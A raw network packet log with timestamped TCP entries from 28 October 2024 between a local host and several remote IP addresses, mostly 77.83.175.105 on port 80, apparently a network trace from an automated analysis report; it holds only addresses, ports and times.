                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534353971 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534416914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534432888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534483910 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534697056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534710884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534727097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534743071 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534778118 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534805059 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535080910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535094976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535109997 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535125971 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535141945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535159111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535191059 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535643101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535659075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535674095 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535689116 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535703897 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535712957 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535718918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535726070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535744905 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.535774946 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536216021 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536230087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536245108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536259890 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536274910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536276102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536299944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536309958 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536318064 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536319971 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536333084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536345959 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.536375999 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537081003 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537096024 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537111044 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537126064 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537139893 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537141085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537156105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537167072 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537170887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537183046 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537184954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537209988 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.537235022 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538006067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538022041 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538036108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538058043 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538063049 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538073063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538089037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538103104 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538105011 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538115978 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538120985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538139105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538146973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.538187027 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539103985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539119959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539134979 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539150953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539165974 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539181948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539184093 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539199114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539215088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539221048 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539237976 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539268017 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539789915 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539812088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539825916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539840937 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539856911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539870977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539870977 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539886951 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539899111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539901972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539913893 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539917946 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539931059 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539943933 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539947033 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539959908 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539973021 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539974928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.539990902 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540014982 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540517092 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540533066 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540545940 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540563107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540570974 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540576935 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540590048 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540592909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540608883 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540630102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540630102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540637970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540663004 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540663958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540673018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540679932 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540693998 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540702105 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540709972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540728092 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.540759087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541318893 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541333914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541347027 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541362047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541397095 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541415930 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.541423082 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.542308092 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.542325020 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.543112993 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.543118954 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.543164015 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.543174028 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548162937 CET4434990620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548232079 CET4434990620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548398972 CET49906443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548413038 CET4434990620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548727036 CET49906443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548738003 CET4434990620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548747063 CET49906443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548886061 CET4434990620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.548921108 CET4434990620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.549304962 CET49906443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.564430952 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.564466000 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.564518929 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.564680099 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.564706087 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.583909035 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584079027 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584177971 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584211111 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584223986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584249020 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584271908 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584280968 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584295034 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584309101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584316015 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584321976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584342003 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584364891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584656954 CET49909443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.584673882 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585160017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585175991 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585191011 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585222006 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585242033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585246086 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585283041 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585424900 CET49909443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.585429907 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.588577032 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.588951111 CET49910443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.588968039 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.589474916 CET49910443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.589497089 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654614925 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654668093 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654710054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654725075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654763937 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654956102 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654970884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.654985905 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655000925 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655010939 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655016899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655049086 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655399084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655414104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.655467987 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.657721996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.657794952 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.657809973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.657814980 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.657850981 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.657994986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658010006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658024073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658037901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658051014 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658055067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658071041 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658088923 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658493042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658508062 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658529043 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658536911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658545017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658552885 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658561945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658575058 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658577919 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658606052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658629894 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.658902884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659022093 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659038067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659051895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659066916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659079075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659080982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659096003 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659111023 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659123898 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659123898 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659173012 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659739017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659754038 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659768105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659781933 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659785986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659797907 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659806013 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659812927 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659828901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659832001 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659845114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659857035 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.659874916 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660464048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660479069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660494089 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660509109 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660523891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660528898 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660538912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660550117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660556078 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660568953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660578966 CET4987580192.168.2.577.83.175.105
